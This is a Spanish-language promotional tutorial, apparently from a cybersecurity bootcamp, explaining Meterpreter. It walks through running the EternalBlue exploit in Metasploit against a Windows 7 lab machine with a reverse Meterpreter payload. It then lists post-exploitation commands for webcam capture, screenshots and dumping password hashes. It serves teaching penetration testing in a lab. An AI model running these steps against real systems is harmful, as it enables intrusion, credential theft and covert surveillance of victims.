¿Qué es Meterpreter?

Contenido del Bootcamp dirigido por:

Qué es Meterpreter
¿Qué encontrarás en este post?

¿Sabes qué es Meterpreter y para qué se utiliza esta herramienta en ciberseguridad? En este artículo, hablaremos sobre uno de los payloads más potentes y versátiles. A continuación, te explicaremos qué es Meterpreter y cómo se usa en ciberseguridad.

¿Qué es un payload?

En ciberseguridad, se conoce como payload al código malicioso que ejecuta un hacker en el ordenador de una víctima. Sin embargo, antes de llegar a este punto, el ciberatacante debe realizar una serie de pasos para acceder al sistema. Para ello existen otras fases del ataque, que incluyen el reconocimiento del sistema, sus vulnerabilidades y la explotación de las mismas.

El payload es un tipo de software que se ejecuta en la fase de postexplotación del sistema. Es decir, después de haber explotado las vulnerabilidades informáticas para ganar acceso a la máquina de la víctima. Un payload puede ser desarrollado y ejecutado de forma manual, pero también existen herramientas de código abierto para automatizar su uso.

Metasploit es un framework de explotación que viene preinstalado en el sistema operativo Kali Linux y cuenta con miles de herramientas de software para pentesting. Las funciones de sus módulos van desde el reconocimiento del sistema, hasta la ejecución de payloads en la fase de postexplotación.

Por medio de un payload, es posible exfiltrar datos sensibles de la máquina, instalar malware en ella, ejecutar comandos de manera remota y mucho más.

¿Qué es Meterpreter?

Meterpreter es un payload que permite ejecutar tareas de forma remota en una máquina. Es un software que se ejecuta en un nivel muy bajo de la máquina, por lo que es bastante difícil de detectar. Por medio del payload Meterpreter es posible conectarse a la webcam del ordenador vulnerado, a su teclado, tomar capturas en pantalla y, en resumen, hacer cualquier cosa con él. No obstante, a la hora de aprender qué es Meterpreter, es importante tener en cuenta que el software no presenta las mismas funciones ni se comporta igual en todos los sistemas operativos. La versión más completa de este programa es Meterpreter para Windows.

¿Cómo utilizar Meterpreter con Metasploit?

Ahora que sabes qué es Meterpreter, hablaremos sobre un método para utilizarlo. La siguiente explicación está hecha con fines académicos. Meterpreter es un payload diseñado para probar el nivel de riesgo de una vulnerabilidad informática y ayudar a aumentar la seguridad del sistema. Su uso con fines maliciosos se considera hacking de sombrero negro. Es decir, es ilegal.

🔴 ¿Quieres entrar de lleno a la Ciberseguridad? 🔴

Descubre el Ciberseguridad Full Stack Bootcamp de KeepCoding. La formación más completa del mercado y con empleabilidad garantizada

👉 Prueba gratis el Bootcamp en Ciberseguridad por una semana

Para usar un payload de tipo Meterpreter con Metasploit, puedes seguir el siguiente proceso:

  • Primero, crea dos máquinas virtuales en un software de virtualización. Una de ellas que sea una versión desactualizada de Windows 7 (es decir, del 2011 o 2012) y la otra que tenga un sistema operativo Kali Linux.
  • Para iniciar la consola de Metasploit, abre una terminal en Kali Linux y ejecuta el siguiente comando:
#Qué es Meterpreter
#msfvenom -p android
msfconsole
  • Para buscar un exploit para Windows, utiliza el comando:
#Qué es Meterpreter
search exploit windows
  • Si ya conoces el exploit que usarás, también puedes buscarlo por su nombre. Por ejemplo, para encontrar el exploit «EternalBlue» ejecuta:
search eternalblue
  • Cuando hayas escogido el exploit, copia su ruta y comienza a utilizarlo con el comando «use», de la siguiente forma:
use exploit/windows/smb/ms17_010_eternalblue

Metasploit cuenta con más de 2.000 exploits entre los que elegir. Para este ejemplo, hemos escogido un exploit de tipo EternalBlue para Windows. Sin embargo, no es el único exploit capaz de ejecutar un payload Meterpreter, así que siéntete libre de experimentar con varios en tus propios laboratorios.

  • Antes de configurar el exploit, para entender mejor qué es Meterpreter y cómo se usa, veremos cómo escoger y configurar el payload. Utiliza el comando «search» para encontrar un payload que se ajuste a tus necesidades. Por ejemplo:
#Qué es Meterpreter
search payload windows
  • De ese modo encontrarás varias alternativas de payloads. Si quieres elegir uno de tipo Meterpreter, busca uno cuya ruta que contenga el término «meterpreter«. Luego, para utilizarlo junto al exploit, ejecuta el comando «set payload» seguido por la ruta del payload seleccionado. Por ejemplo:
#meterpreter reverse_tcp
set payload windows/x64/meterpreter/reverse_http

Ten presente que, si no eliges algún payload, metasploit meterpreter ejecutará uno por defecto con el exploit. Para saber qué payload ejecuta de manera predeterminada un exploit, utiliza el comando «show options«.

  • Ahora, antes de ejecutar el exploit, es necesario configurarlo. Para saber qué variables es obligatorio definir, ejecuta el comando:
show options
  • Para el exploit EternalBlue que hemos elegido, los datos obligatorios son «LPORT = puerto local» y «RHOSTS = ip del ordenador de la víctima». En Metasploit, las variables se definen con el comando set. Es decir, para establecer sus valores ejecutaríamos los comandos:
set LPORT 6666
set RHOSTS 192.168.172.128

En este ejemplo, el puerto local se ha escogido de forma aleatoria por ser local. La dirección IP de RHOSTS es la de la máquina Windows 7 y, para fines del ejemplo, supondremos que es 192.168.172.128.

  • Finalmente, para ejecutar el exploit junto con el payload de Meterpreter, utiliza el comando:
exploit

Después de seguir este proceso, tendrás acceso a la máquina virtual con Windows 7 por medio de Meterpreter. Para usar el payload dentro de la máquina, te recomendamos aprender los comandos de Meterpreter.

Comandos de Meterpreter

El siguiente paso para saber cómo usar Metepreter se basa en entender las funciones de sus comandos.

  • Para ver toda la lista de comandos, ejecuta la opción:
help
  • Para ejecutar el payload en segundo plano y hacer otras tareas mientras tanto, usa el comando:
backround
  • Para ver tus sesiones de postexplotación, usa:
sessions
  • Para acceder a una de ellas, utiliza la estructura:
sessions -i 1
  • Para ver información básica del equipo explotado:
sysinfo
  • Para ver información sobre sus direcciones IP:
ipconfig
  • Para ver todos los procesos, qué usuario y qué fichero los ejecutó:
ps
  • Para ver el nivel de privilegios con el que estás ejecutando el payload:
getuid
  • Para ver un listado de las webcams conectadas al equipo:
webcam_list
  • Para tomar una foto instantánea con la webcam:
webcam_snap
  • Para ver una transmisión de vídeo en vivo desde la webcam:
webcam_stream
  • Para tomar una captura de la pantalla en ese momento:
screenshot
  • Para ver las funciones hash de las contraseñas de los usuarios:
hashdump

Estos son solo algunos de los comandos más interesantes para comenzar a aprender cómo usar Meterpreter para Windows. En conclusión, se trata de un payload con alcances muy significativos y, en pentesting, permite poner a prueba el nivel de peligro de una vulnerabilidad.

¿Cómo aprender más?

Si quieres saber más sobre qué es Meterpreter y cómo utilizarlo en hacking ético, en KeepCoding tenemos un curso especialmente pensado para ti. Ingresa a nuestro Ciberseguridad Full Stack Bootcamp y persigue tus objetivos al especializarte en este ámbito del sector IT en tan solo 7 meses. ¡Inscríbete ya y cambia tu vida!

¡CONVOCATORIA ABIERTA!

Ciberseguridad

Full Stack Bootcamp

Clases en Directo | Profesores en Activo | Temario 100% actualizado